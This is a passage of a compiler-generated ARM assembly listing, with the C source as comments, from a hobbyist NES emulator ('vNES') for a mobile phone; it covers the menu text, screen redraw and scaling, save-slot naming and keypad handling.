//   82 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
//   83 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
//   84 
//   85 enum{ pwidth=6, pheight, poptimize, pfilter, pstep, screenx, screeny};
//   86 
//   87 char help[]=
help:
        DS8 168
        REQUIRE `?<Initializer for help>`

        RSEG DATA_I:DATA:SORT:NOROOT(2)
Title:
        DS8 4
        REQUIRE `?<Initializer for Title>`

        RSEG DATA_I:DATA:SORT:NOROOT(2)
errors:
        DS8 28
        REQUIRE `?<Initializer for errors>`
//   88 " vNES 0.4f (c)bn"
//   89 "\n1.Load 0-9"
//   90 "\n2.Save 0-9"
//   91 "\n3.FrmSkp 1-9:%d"
//   92 "\n4.Optimize:%d"
//   93 "\n5.Redefine"
//   94 "\n6.Quality:%d"
//   95 "\n7.ScrStep:%02d"
//   96 "\n8.SizeX:%03d"
//   97 "\n9.SizeY:%03d"
//   98 "\n0.Exit"
//   99 "\ncbn.narod.ru"
//  100 "\ncbn@yandex.ru";
//  101 
//  102 

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock17 Using cfiCommon1
        CFI Function outmenu
        ARM
//  103 void outmenu(const char *help){
//  104   sprintf(menu,help,param[pframeskip],t_boolean_static_fld,param[pfilter],param[pstep],getWidth, getHeight);//,param[pslow]);//,buf[stwidth],buf[stheight],buf[speed],buf[free],buf[fill],buf[lorec]|(buf[hirec]<<8));
outmenu:
        LDR      R2,??DataTable46  ;; getHeight
        PUSH     {LR}
        CFI ?RET Frame(CFA, -4)
        CFI CFA R13+4
        LDR      R2,[R2, #+0]
        MOV      R1,R0
        LDR      R0,??DataTable49  ;; param
        PUSH     {R2}
        CFI CFA R13+8
        LDR      R2,??DataTable45  ;; getWidth
        LDR      R2,[R2, #+0]
        PUSH     {R2}
        CFI CFA R13+12
        LDRB     R2,[R0, #+10]
        PUSH     {R2}
        CFI CFA R13+16
        LDRB     R2,[R0, #+9]
        PUSH     {R2}
        CFI CFA R13+20
        LDR      R2,??DataTable53  ;; t_boolean_static_fld
        LDRB     R3,[R2, #+0]
        LDRB     R2,[R0, #+1]
        ADD      R0,R0,#+280
        SWI      +22
//  105 }
        POP      {R0-R3,PC}       ;; return
        CFI EndBlock cfiBlock17

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock18 Using cfiCommon0
        CFI NoFunction
        THUMB
??onredslow??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock18
        REQUIRE onredslow
//  106 
//  107 //void redEL(){
//  108 //  int i,j,k;
//  109 //  int r,g,b;
//  110 //  short *ss=screen;
//  111 //  int *s=screens;//main_a_...
//  112 //  for(j=0;j<240*240;j++){
//  113 ////    for(i=0;i<240;i++){
//  114 //      k=*s++;
//  115 //      *ss++=((k&0xf80000)>>8)|((k&0xfc00)>>5)|((k&0xf8)>>3);
//  116 ////    }
//  117 //  }
//  118 //}
//  119 
//  120 //int screenx=0, screeny=0;
//  121 

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock19 Using cfiCommon1
        CFI Function onredslow
        ARM
//  122 void onredslow(){
//  123   int j,k,l;
//  124   short *s, *ss;
//  125   cls();
onredslow:
        LDR      R0,??DataTable37  ;; screensize
        PUSH     {R4-R10,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R10 Frame(CFA, -8)
        CFI R9 Frame(CFA, -12)
        CFI R8 Frame(CFA, -16)
        CFI R7 Frame(CFA, -20)
        CFI R6 Frame(CFA, -24)
        CFI R5 Frame(CFA, -28)
        CFI R4 Frame(CFA, -32)
        CFI CFA R13+32
        LDR      R4,??DataTable38  ;; screen
        LDR      R0,[R0, #+0]
//  126   if(l=(((C65?130:height)-getHeight)>>1)<0) l=0;
//  127   if(k=((width-getWidth)>>1)<0) k=0;
//  128   ss=screen+l*width+k;
//  129     l=(getWidth>width)?width:getWidth;
        LDR      R5,??DataTable45  ;; getWidth
        ASR      R2,R0,#+2
        LDR      R0,[R4, #+0]
        LDR      R6,??DataTable41  ;; width
        MOV      R1,#+0
        _BLF     memsetd,??memsetd??rA
//  130     k=(getHeight>height)?height:getHeight;
        LDR      R0,??DataTable46  ;; getHeight
        LDR      R1,[R5, #+0]
        LDR      R8,[R0, #+0]
        LDR      R0,??DataTable42  ;; height
        LDR      R7,[R6, #+0]
        LDR      R0,[R0, #+0]
        LDR      R4,[R4, #+0]
        CMP      R7,R1
        MOVGE    R7,R1
        CMP      R0,R8
        MOVLT    R8,R0
//  131     s=(short*)screens+param[screenx]+param[screeny]*getWidth;
        LDR      R0,??DataTable49  ;; param
//  132     for(j=0;j<k;j++){
        MOV      R10,#+0
        LDRB     R2,[R0, #+12]
        LDRB     R0,[R0, #+11]
        CMP      R8,#+1
        MUL      R2,R1,R2
        LDR      R1,??DataTable24  ;; screens
        LDR      R1,[R1, #+0]
        ADD      R0,R1,R0, LSL #+1
        ADD      R9,R0,R2, LSL #+1
        BGE      ??onredslow_0
        POP      {R4-R10,PC}
//  133       movsw(ss,s,l);
??onredslow_1:
        MOV      R2,R7
        MOV      R1,R9
        MOV      R0,R4
        _BLF     movsw,??movsw??rA
//  134       ss+=width;
        LDR      R0,[R6, #+0]
//  135       s+=getWidth;
//  136     }
        ADD      R10,R10,#+1
        ADD      R4,R4,R0, LSL #+1
        LDR      R0,[R5, #+0]
        ADD      R9,R9,R0, LSL #+1
??onredslow_0:
        CMP      R10,R8
        BLT      ??onredslow_1
//  137 }
        POP      {R4-R10,PC}      ;; return
        CFI EndBlock cfiBlock19

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock20 Using cfiCommon0
        CFI NoFunction
        THUMB
??onredraw??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock20
        REQUIRE onredraw
//  138 
//  139 extern void filter2(void *to, void *from);
//  140 extern void filter(void *to, void *from);
//  141 

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock21 Using cfiCommon1
        CFI Function onredraw
        ARM
//  142 void onredraw(){ // Перерисовка экрана screen[132*176]
//  143   if(param[pfilter] && !EL71){ if(C65) filter(screen,screens); else filter2(screen,screens);//!!!!!2
onredraw:
        LDR      R0,??DataTable38  ;; screen
        LDR      R1,??DataTable24  ;; screens
        LDR      R2,??DataTable51  ;; EL71
        PUSH     {R4,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R4 Frame(CFA, -8)
        CFI CFA R13+8
        LDR      R0,[R0, #+0]
        LDR      R1,[R1, #+0]
        LDR      R4,??DataTable49  ;; param
        LDRB     R2,[R2, #+0]
        LDRB     R3,[R4, #+9]
        CMP      R3,#+0
        BEQ      ??onredraw_0
        CMP      R2,#+0
        BNE      ??onredraw_0
        LDR      R2,??DataTable50  ;; C65
        LDRB     R2,[R2, #+0]
        CMP      R2,#+0
        BEQ      ??onredraw_1
        _BLF     filter,??filter??rA
        B        ??onredraw_2
??onredraw_1:
        _BLF     filter2,??filter2??rA
        B        ??onredraw_2
//  144   }else
//  145   if(getWidth==width && getHeight==height)
??onredraw_0:
        LDR      R3,??DataTable45  ;; getWidth
        LDR      R12,??DataTable41  ;; width
        LDR      R3,[R3, #+0]
        LDR      R12,[R12, #+0]
        CMP      R3,R12
        BNE      ??onredraw_3
        LDR      R3,??DataTable46  ;; getHeight
        LDR      R12,??DataTable42  ;; height
        LDR      R3,[R3, #+0]
        LDR      R12,[R12, #+0]
        CMP      R3,R12
        BNE      ??onredraw_3
//  146     movsd(screen,screens,EL71?(255*240/2):(132*176/2));
        CMP      R2,#+0
        MOVNE    R2,#+136
        ORRNE    R2,R2,#0x7700
        MOVEQ    R2,#+96
        ORREQ    R2,R2,#0x2D00
        _BLF     movsd,??movsd??rA
        B        ??onredraw_2
//  147   else onredslow();
??onredraw_3:
        BL       onredslow
//  148   if(mode) drawhelp((mode==99)?helpsel:((mode==98)?helpkey:help));
??onredraw_2:
        LDR      R1,[R4, #+256]
        CMP      R1,#+0
        POPEQ    {R4,PC}
        LDR      R0,??onredraw_4  ;; helpsel
        CMP      R1,#+99
        BEQ      ??onredraw_5
        CMP      R1,#+98
        ADDEQ    R0,R0,#+12
        ADDNE    R0,R4,#+920
??onredraw_5:
        BL       drawhelp
//  149 }
        POP      {R4,PC}          ;; return
        DATA
??onredraw_4:
        DC32     helpsel
        CFI EndBlock cfiBlock21

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable24:
        DC32     screens

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock22 Using cfiCommon0
        CFI NoFunction
        THUMB
??getscrXY??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock22
        REQUIRE getscrXY
//  150   //  extern void redraw(short *screen, int *from, int size);
//  151 //  extern void filter(short *screen, int *from);
//  152 // if(!c65) 
//  153 //  redraw(screen, screens, (EL71)?(240*240):(132*176));
//  154 // else  filter(screen, screens);
//  155 /*  int i,j,k;
//  156   int r,g,b;
//  157   short *ss=screen;
//  158   int *s=screens;//main_a_...
//  159   for(j=0;j<176;j++){
//  160     for(i=0;i<132;i++){
//  161       k=*s++;
//  162       //r=(k>>16)&0xff;
//  163       //g=(k>>8)&0xff;
//  164       //b=(k)&0xff;
//  165       *ss++=((k&0xf80000)>>8)|((k&0xfc00)>>5)|((k&0xf8)>>3);
//  166         //(r>>3<<11)|(g>>2<<5)|(b>>3);
//  167     }
//  168     //s+=256-132;
//  169   }
//  170 */
//  171 //  int i,j;
//  172 //  for(i=0,j=color++;i<132*176;i++){
//  173 //    screen[i]=j++;
//  174 //  }
//  175 //}
//  176 

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock23 Using cfiCommon1
        CFI Function getscrXY
        ARM
//  177 void getscrXY(){ //помен. размеры экрана max 256 240
//  178   //int x,y;
//  179 //  if(param[protate]){ x=height; y=width;}
//  180   //else {}
//  181   //x=width; y=height;
//  182   if(!(getWidth=param[pwidth])) getWidth=256;
getscrXY:
        LDR      R0,??DataTable49  ;; param
        PUSH     {R4,R5,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R5 Frame(CFA, -8)
        CFI R4 Frame(CFA, -12)
        CFI CFA R13+12
        LDRB     R1,[R0, #+6]
//  183   if(!(getHeight=param[pheight])) getHeight=256;
        LDRB     R2,[R0, #+7]
        CMP      R1,#+0
        MOVEQ    R1,#+256
        CMP      R2,#+0
        MOVEQ    R2,#+256
//  184   if(getWidth<64) getWidth=64;
        CMP      R1,#+64
        MOVLT    R1,#+64
        BLT      ??getscrXY_0
//  185   else if(getWidth>256) getWidth=256;
        MOV      R3,#+1
        ORR      R3,R3,#0x100
        CMP      R1,R3
        MOVGE    R1,#+256
??getscrXY_0:
        LDR      R3,??DataTable45  ;; getWidth
//  186   if(getHeight<64) getHeight=64;
        CMP      R2,#+64
        STR      R1,[R3, #+0]
        MOVLT    R2,#+64
        BLT      ??getscrXY_1
//  187   else if(getHeight>240) getHeight=240;
        CMP      R2,#+241
        MOVGE    R2,#+240
??getscrXY_1:
        LDR      R1,??DataTable46  ;; getHeight
//  188   screen_length=getWidth*getHeight;
        LDR      R3,[R3, #+0]
//  189   if(param[screenx]>getWidth-width) param[screenx]=(getWidth-width<0)? 0: (getWidth-width);
        LDRB     R5,[R0, #+11]
        STR      R2,[R1, #+0]
        LDR      R4,??getscrXY_2  ;; screen_length
        MUL      R12,R2,R3
        LDR      R2,??DataTable41  ;; width
        STR      R12,[R4, #+0]
        LDR      R2,[R2, #+0]
        MOV      R4,#+0
        SUB      R12,R3,R2
        CMP      R12,R5
        BGE      ??getscrXY_3
        CMP      R12,#+0
        MOVMI    R2,#+0
        SUBPL    R2,R3,R2
        STRB     R2,[R0, #+11]
//  190   if(param[screeny]>getHeight-height) param[screeny]=(getHeight-height<0)? 0:(getHeight-height);
??getscrXY_3:
        LDR      R2,??DataTable42  ;; height
        LDRB     R5,[R0, #+12]
        LDR      R2,[R2, #+0]
        LDR      R1,[R1, #+0]
        SUB      R3,R1,R2
        CMP      R3,R5
        BGE      ??getscrXY_4
        CMP      R3,#+0
        SUBPL    R4,R1,R2
        STRB     R4,[R0, #+12]
//  191   cls();
??getscrXY_4:
        LDR      R0,??DataTable37  ;; screensize
        MOV      R1,#+0
        LDR      R0,[R0, #+0]
        ASR      R2,R0,#+2
        LDR      R0,??DataTable38  ;; screen
        LDR      R0,[R0, #+0]
        _BLF     memsetd,??memsetd??rA
//  192 //  if(1)//C65) 
//  193 //    getHeight=130;
//  194 //  else if(EL71){ getHeight=getWidth=240;}
//  195 //  getHeight=getWidth=100;
//  196 //  screen_length=getWidth*getHeight;
//  197 }
        POP      {R4,R5,PC}       ;; return
        DATA
??getscrXY_2:
        DC32     screen_length
        CFI EndBlock cfiBlock23

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable37:
        DC32     screensize

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable38:
        DC32     screen

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock24 Using cfiCommon0
        CFI NoFunction
        THUMB
??savename??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock24
        REQUIRE savename
//  198 
//  199 //extern void keyPressed(int i1);
//  200 //extern void keyReleased(int i1);
//  201 
//  202 //int keyexit(){
//  203 //  running=0; exit=1; saveini(); return 0;
//  204 //}
//  205 

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock25 Using cfiCommon1
        CFI Function savename
        ARM
//  206 void savename(char c){
savename:
        PUSH     {R4,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R4 Frame(CFA, -8)
        CFI CFA R13+8
//  207   char *s=strrchr(romname,'.');
        MOV      R1,#+46
        MOV      R4,R0
        LDR      R0,??savename_0  ;; param + 664
        SWI      +279
//  208   *++s='s'; *++s=c; *++s=0;
        ADD      R0,R0,#+1
        MOV      R1,#+115
        STRB     R1,[R0], #+1
        STRB     R4,[R0], #+1
        MOV      R1,#+0
        STRB     R1,[R0, #+0]
//  209 }
        POP      {R4,PC}          ;; return
        DATA
??savename_0:
        DC32     param + 664
        CFI EndBlock cfiBlock25

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock26 Using cfiCommon0
        CFI NoFunction
        THUMB
??onkey??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock26
        REQUIRE onkey
//  210 
//  211 #define JOY_UP 0x10
//  212 #define JOY_DOWN 0x20
//  213 #define JOY_LEFT 0x40
//  214 #define JOY_RIGHT 0x80
//  215 #define JOY_START 0x1
//  216 #define JOY_SELECT 0x2
//  217 #define JOY_AB 3
//  218 
//  219 #define JOY_A 0x4    
//  220 #define JOY_B 0x8
//  221 
//  222 #define JOY_AA 0xff    
//  223 #define JOY_BB 0xfe
//  224 
//  225 //#define step 8
//  226 extern void SetVolume(char Vol);
//  227 // keycode - код клавиши, pressed - нажата/отпущена/удерживается

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock27 Using cfiCommon1
        CFI Function onkey
        ARM
//  228 int onkey(unsigned char keycode, int pressed){ //  Обработчик клавиш. Вернуть 0 или 1 для выхода
onkey:
        PUSH     {R4-R11,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R11 Frame(CFA, -8)
        CFI R10 Frame(CFA, -12)
        CFI R9 Frame(CFA, -16)
        CFI R8 Frame(CFA, -20)
        CFI R7 Frame(CFA, -24)
        CFI R6 Frame(CFA, -28)
        CFI R5 Frame(CFA, -32)
        CFI R4 Frame(CFA, -36)
        CFI CFA R13+36
//  229   byte *ptr;
//  230   //int f;
//  231   switch(pressed){
        LDR      R6,??DataTable49  ;; param
        MOV      R7,R0
        MOV      R0,#+147
        ORR      R0,R0,#0x100
        CMP      R1,R0
        BEQ      ??onkey_3
        CMP      R1,#+404
        BEQ      ??onkey_4
        ADD      R0,R0,#+2
        CMP      R1,R0
        BEQ      ??onkey_3
        B        ??onkey_5
//  232   case KEY_UP: if(!mode) keypress(keycode,0); break; // Клавиша отпущена
??onkey_4:
        LDR      R0,[R6, #+256]
        CMP      R0,#+0
        BNE      ??onkey_6
        MOV      R1,#+0
        B        ??onkey_7
//  233   case LONG_PRESS: // Клавиша удерживается долго (повтор)
//  234   case KEY_DOWN: // Клавиша нажата
//  235     if(exit) return 1; //Выход
??onkey_3:
        LDR      R0,[R6, #+264]
        CMP      R0,#+0
        BEQ      ??onkey_8
??onkey_9:
        MOV      R0,#+1
        POP      {R4-R11,PC}
//  236     if(keycode==RED_BUTTON)return 1;//keyexit();
??onkey_8:
        CMP      R7,#+12
        BEQ      ??onkey_9
//  237     if(keycode==VOL_UP_BUTTON)
        LDR      R0,??onkey_10    ;; Volume
        CMP      R7,#+13
        LDRSB    R0,[R0, #+0]
//  238         SetVolume( Volume + 1 );
        ADDEQ    R0,R0,#+1
        BEQ      ??onkey_11
//  239     if(keycode==VOL_DOWN_BUTTON)
        CMP      R7,#+14
        BNE      ??onkey_12
//  240         SetVolume( Volume - 1 );
        SUB      R0,R0,#+1
??onkey_11:
        AND      R0,R0,#0xFF
        _BLF     SetVolume,??SetVolume??rA
//  241     switch(mode){
??onkey_12:
        LDR      R12,[R6, #+276]
        LDR      LR,[R6, #+256]
        MOV      R0,R12
        LDRB     R9,[R6, #+2]
        MOV      R1,#+10
        MLA      R0,R1,R0,R7
        MOV      R1,R7
        ADD      R8,R0,#+208
        MOV      R0,R7
        MOV      R2,#+3
        MOV      R3,#+2
        MOV      R4,#+1
        MOV      R5,#+0
        SUB      R10,LR,#+1
        CMP      R10,#+99
        BHI      ??onkey_13
        ADR      R11,??onkey_0
        MOV      R10,R10, LSL #+1
        LDRH     R11,[R11, R10]
        ADD      PC,PC,R11, LSL #+2
        DATA
??onkey_0:
        DC16     +118,+129,+136,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+212
        DC16     +217,+229,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+212
        DC16     +217,+236,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+212,+243
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+250,+250,+250
        DC16     +250,+170,+147,+49
        ARM
//  242     case 100: // main menu
//  243       switch(keycode){
??onkey_14:
        LDRB     R1,[R6, #+10]
        LDRB     R8,[R6, #+11]
        LDRB     R9,[R6, #+12]
        MOV      R7,R1
        SUB      R0,R0,#+48
        CMP      R0,#+14
        BHI      ??onkey_15
        ADR      R10,??onkey_1
        LDRSB    R10,[R10, R0]
        ADD      PC,PC,R10, LSL #+2
        DATA
??onkey_1:
        DC8      +161,+3,+5,+7
        DC8      +9,+18,+40,+20
        DC8      +16,+56,+54,+30
        DC8      +36,+22,+28,+0
        ARM
//  244       case '0': return 1;//keyexit(); // Exit
//  245       case '1': mode=1; break; //load
??onkey_16:
        STR      R4,[R6, #+256]
        B        ??onkey_5
//  246       case '2': mode=2; break; //save
??onkey_17:
        STR      R3,[R6, #+256]
        B        ??onkey_5
//  247       case '3': mode=3; break; //frmskip
??onkey_18:
        STR      R2,[R6, #+256]
        B        ??onkey_5
//  248       case '4': t_boolean_static_fld=(t_boolean_static_fld+1)&1; mode=0; break;
??onkey_19:
        LDR      R0,??DataTable53  ;; t_boolean_static_fld
        LDRB     R1,[R0, #+0]
        ADD      R1,R1,#+1
        AND      R1,R1,#0x1
        STRB     R1,[R0, #+0]
??onkey_15:
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  249       case '8': mode=40; break; //sizex
??onkey_20:
        MOV      R0,#+40
        B        ??onkey_21
//  250       case '5': mode=99; break; //redefine
??onkey_22:
        MOV      R0,#+99
        B        ??onkey_21
//  251       case '7': mode=71; break;
??onkey_23:
        MOV      R0,#+71
        B        ??onkey_21
//  252       case LEFT_BUTTON: param[screenx]-=(param[screenx]<param[pstep])?param[screenx]:param[pstep]; getscrXY(); break;
??onkey_24:
        CMP      R8,R1
        MOVCC    R7,R8
        SUB      R0,R8,R7
??onkey_25:
        STRB     R0,[R6, #+11]
        BL       getscrXY
        B        ??onkey_5
//  253       case RIGHT_BUTTON: param[screenx]+=param[pstep]; getscrXY(); break;
??onkey_26:
        ADD      R0,R1,R8
        B        ??onkey_25
//  254       case UP_BUTTON: param[screeny]-=(param[screeny]<param[pstep])?param[screeny]:param[pstep]; getscrXY(); break;
??onkey_27:
        CMP      R9,R1
        MOVCC    R7,R9
        SUB      R0,R9,R7
        STRB     R0,[R6, #+12]
        BL       getscrXY
        B        ??onkey_5
//  255       case DOWN_BUTTON: param[screeny]+=param[pstep]; getscrXY(); break;
??onkey_28:
        ADD      R0,R1,R9
        STRB     R0,[R6, #+12]
        BL       getscrXY
        B        ??onkey_5
//  256       case '6': 
//  257         if(param[pfilter]=(param[pfilter]+1)&1){
??onkey_29:
        LDRB     R0,[R6, #+9]
        ADD      R0,R0,#+1
        ANDS     R0,R0,#0x1
        STRB     R0,[R6, #+9]
//  258           param[pwidth]=0; param[pheight]=240; getscrXY();
        STRBNE   R5,[R6, #+6]
        MOVNE    R0,#+240
        BNE      ??onkey_30
//  259         }else{
//  260            param[pwidth]=width; param[pheight]=height; getscrXY();
        LDR      R0,??DataTable41  ;; width
        LDR      R0,[R0, #+0]
        STRB     R0,[R6, #+6]
        LDR      R0,??DataTable42  ;; height
        LDR      R0,[R0, #+0]
??onkey_30:
        STRB     R0,[R6, #+7]
??onkey_31:
        BL       getscrXY
//  261         }
//  262         mode=0; break;
??onkey_32:
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  263       case '9': mode=60; break; //sizey
??onkey_33:
        MOV      R0,#+60
        B        ??onkey_21
//  264     //  case '7': mode=0; cls(); if(++param[protate]>2) param[protate]=0; break; //rotate
//  265 //      case '8': mode=0; cls(); param[presize]=~param[presize]; break; //resize
//  266 //      case '9': param[pslow]=(param[pslow]+1)&1; break; //slow
//  267       default: mode=0; break;
//  268       }break;
//  269     case 1: //load
//  270       if(keycode>='0' && keycode<='9'){ 
??onkey_34:
        CMP      R7,#+48
        BCC      ??onkey_15
        CMP      R7,#+58
        BCS      ??onkey_15
//  271         savename(keycode);
        BL       savename
//  272         v_boolean_static_fld=o_boolean_static_fld=1;
        LDR      R0,??onkey_10+0x4  ;; o_boolean_static_fld
??onkey_35:
        STR      R5,[R6, #+256]
        STRB     R4,[R0, #+0]
        LDR      R0,??onkey_10+0x8  ;; v_boolean_static_fld
        STRB     R4,[R0, #+0]
        B        ??onkey_5
//  273         //if((f=fopen(romname,A_ReadOnly+A_BIN,P_READ,&err))!=-1){
//  274           //FCEUSS_LoadFP(f);
//  275         //  fclose(f,&err);
//  276         //}
//  277       }
//  278       mode=0; break;
//  279     case 2: //save
//  280       if(keycode>='0' && keycode<='9'){
??onkey_36:
        CMP      R7,#+48
        BCC      ??onkey_15
        CMP      R7,#+58
        BCS      ??onkey_15
//  281         savename(keycode);
        BL       savename
//  282         v_boolean_static_fld=d_boolean_static_fld=1;
        LDR      R0,??onkey_10+0xC  ;; d_boolean_static_fld
        B        ??onkey_35
//  283         //if((f=fopen(romname,A_WriteOnly+A_BIN+A_Create+A_Truncate,P_WRITE,&err))!=-1){
//  284           //FCEUSS_SaveFP(f);
//  285         //  fclose(f,&err);
//  286         //}
//  287       }
//  288       mode=0; break;
//  289     case 3: //frame_skip
//  290       if(keycode>='0' && keycode<='9') A=param[pframeskip]=keycode-'0';
??onkey_37:
        CMP      R7,#+48
        BCC      ??onkey_15
        CMP      R7,#+58
        BCS      ??onkey_15
        LDR      R1,??DataTable52  ;; A
        ADD      R0,R7,#+208
        STRB     R0,[R6, #+1]
        AND      R0,R0,#0xFF
        STR      R0,[R1, #+0]
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  291       mode=0; break;
//  292 //    case 5: //redefine
//  293 //      mode=99; break;
//  294     case 99: //redefine - sel key
//  295      switch(keycode){
??onkey_38:
        SUBS     R0,R0,#+1
        SUBSNE   R0,R0,#+3
        SUBSNE   R0,R0,#+8
        BEQ      ??onkey_15
//  296       case RIGHT_SOFT:
//  297       case LEFT_SOFT:
//  298       //case GREEN_BUTTON: 
//  299       case RED_BUTTON: mode=0; break;
//  300       default:
//  301       ptr=param+(param[palternate]?key2:key1);
        CMP      R9,#+0
        MOVNE    R0,#+160
        MOVEQ    R0,#+64
        ADD      R4,R0,R6
//  302       if(!(redefineptr=(byte*)strchr((char*)ptr,keycode))){ //нет клавиши
        MOV      R0,R4
        SWI      +24
        STR      R0,[R6, #+268]
        CMP      R0,#+0
        BNE      ??onkey_39
//  303         redefineptr=ptr+strlen((char*)ptr);
        MOV      R0,R4
        SWI      +27
        ADD      R0,R0,R4
        STR      R0,[R6, #+268]
//  304         *redefineptr=keycode;
        STRB     R7,[R0, #+0]
//  305       }
//  306        redefineptr+=maxkey;
??onkey_39:
        LDR      R0,[R6, #+268]
        ADD      R0,R0,#+32
        STR      R0,[R6, #+268]
//  307        mode=98; break;
        MOV      R0,#+98
        B        ??onkey_21
//  308      } break; 
//  309 
//  310     case 98: //select key action
//  311       switch(keycode){
??onkey_40:
        LDR      R1,[R6, #+268]
        SUB      R0,R0,#+42
        CMP      R0,#+15
        BHI      ??onkey_15
        ADR      R7,??onkey_2
        LDRSB    R7,[R7, R0]
        ADD      PC,PC,R7, LSL #+2
        DATA
??onkey_2:
        DC8      +31,+192,+192,+192
        DC8      +192,+192,+7,+9
        DC8      +15,+12,+21,+3
        DC8      +23,+25,+17,+27
        ARM
//  312 // const char helpkey[]=" 1 A\n2 up\n3 B\n4 left\n5 start\n6 right\n7 AA\n8 down\n9 BB\n0 select";
//  313  
//  314       case '5': *redefineptr=JOY_B; break;
??onkey_41:
        MOV      R0,#+8
??onkey_42:
        STRB     R0,[R1, #+0]
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  315       case '0': *redefineptr=JOY_A; break;
??onkey_43:
        MOV      R0,#+4
        B        ??onkey_42
//  316       case '1': *redefineptr=JOY_START; break;
??onkey_44:
        STRB     R4,[R1, #+0]
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  317       case '3': *redefineptr=JOY_SELECT; break;
??onkey_45:
        STRB     R3,[R1, #+0]
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  318       case '2': *redefineptr=JOY_UP; break;
??onkey_46:
        MOV      R0,#+16
        B        ??onkey_42
//  319       case '8': *redefineptr=JOY_DOWN; break;
??onkey_47:
        MOV      R0,#+32
??onkey_48:
        STRB     R0,[R1, #+0]
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  320       case '4': *redefineptr=JOY_LEFT; break;
??onkey_49:
        MOV      R0,#+64
        B        ??onkey_42
//  321       case '6': *redefineptr=JOY_RIGHT; break;
??onkey_50:
        MOV      R0,#+128
        B        ??onkey_48
//  322       case '7':  *redefineptr=JOY_AA; break;
??onkey_51:
        MOV      R0,#+255
        B        ??onkey_42
//  323       case '9':  *redefineptr=JOY_BB; break;
??onkey_52:
        MOV      R0,#+254
        STRB     R0,[R1, #+0]
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  324       case '*':  *redefineptr=JOY_AB; break;
??onkey_53:
        STRB     R2,[R1, #+0]
        STR      R5,[R6, #+256]
        B        ??onkey_5
//  325       } mode=0; break;
//  326 
//  327     case 40: if(keycode>='0' && keycode<='9'){ 
??onkey_54:
        CMP      R7,#+48
        BCC      ??onkey_15
        CMP      R7,#+58
        BCS      ??onkey_15
//  328        tmpsize=keycode-'0'; ++mode;} else mode=0; break;
        B        ??onkey_55
//  329     case 41: if(keycode>='0' && keycode<='9'){ 
??onkey_56:
        CMP      R7,#+48
        BCC      ??onkey_15
        CMP      R7,#+58
        BCS      ??onkey_15
//  330       tmpsize=tmpsize*10+keycode-'0'; ++mode;} else mode=0; break;
        MOV      R0,#+10
        MLA      R1,R0,R12,R1
??onkey_55:
        SUB      R0,R1,#+48
        STR      R0,[R6, #+276]
        ADD      R0,LR,#+1
??onkey_21:
        STR      R0,[R6, #+256]
??onkey_5:
        MOV      R0,#+0
        POP      {R4-R11,PC}
//  331     case 42: if(keycode>='0' && keycode<='9'){ 
??onkey_57:
        CMP      R7,#+48
        BCC      ??onkey_15
        CMP      R7,#+58
        BCS      ??onkey_15
//  332       param[pfilter]=0;
        STRB     R5,[R6, #+9]
//  333       param[pwidth]=tmpsize*10+keycode-'0'; getscrXY();
        STRB     R8,[R6, #+6]
        B        ??onkey_31
//  334     } mode=0; break;
//  335     
//  336     case 60: if(keycode>='0' && keycode<='9'){ 
//  337        tmpsize=keycode-'0'; ++mode;} else mode=0; break;
//  338     case 61: if(keycode>='0' && keycode<='9'){ 
//  339       tmpsize=tmpsize*10+keycode-'0'; ++mode;} else mode=0; break;
//  340     case 62: if(keycode>='0' && keycode<='9'){ 
??onkey_58:
        CMP      R7,#+48
        BCC      ??onkey_15
        CMP      R7,#+58
        BCS      ??onkey_15
//  341       param[pfilter]=0;
        STRB     R5,[R6, #+9]
//  342       param[pheight]=tmpsize*10+keycode-'0'; getscrXY();
        STRB     R8,[R6, #+7]
        B        ??onkey_31
//  343     } mode=0; break;
//  344 
//  345     case 71:
//  346       if(keycode>='0' && keycode<='9'){ tmpsize=keycode-'0'; ++mode;}
//  347       else mode=0; break;
//  348     case 72:
//  349       if(keycode>='0' && keycode<='9')  param[pstep]=tmpsize*10+keycode-'0';
??onkey_59:
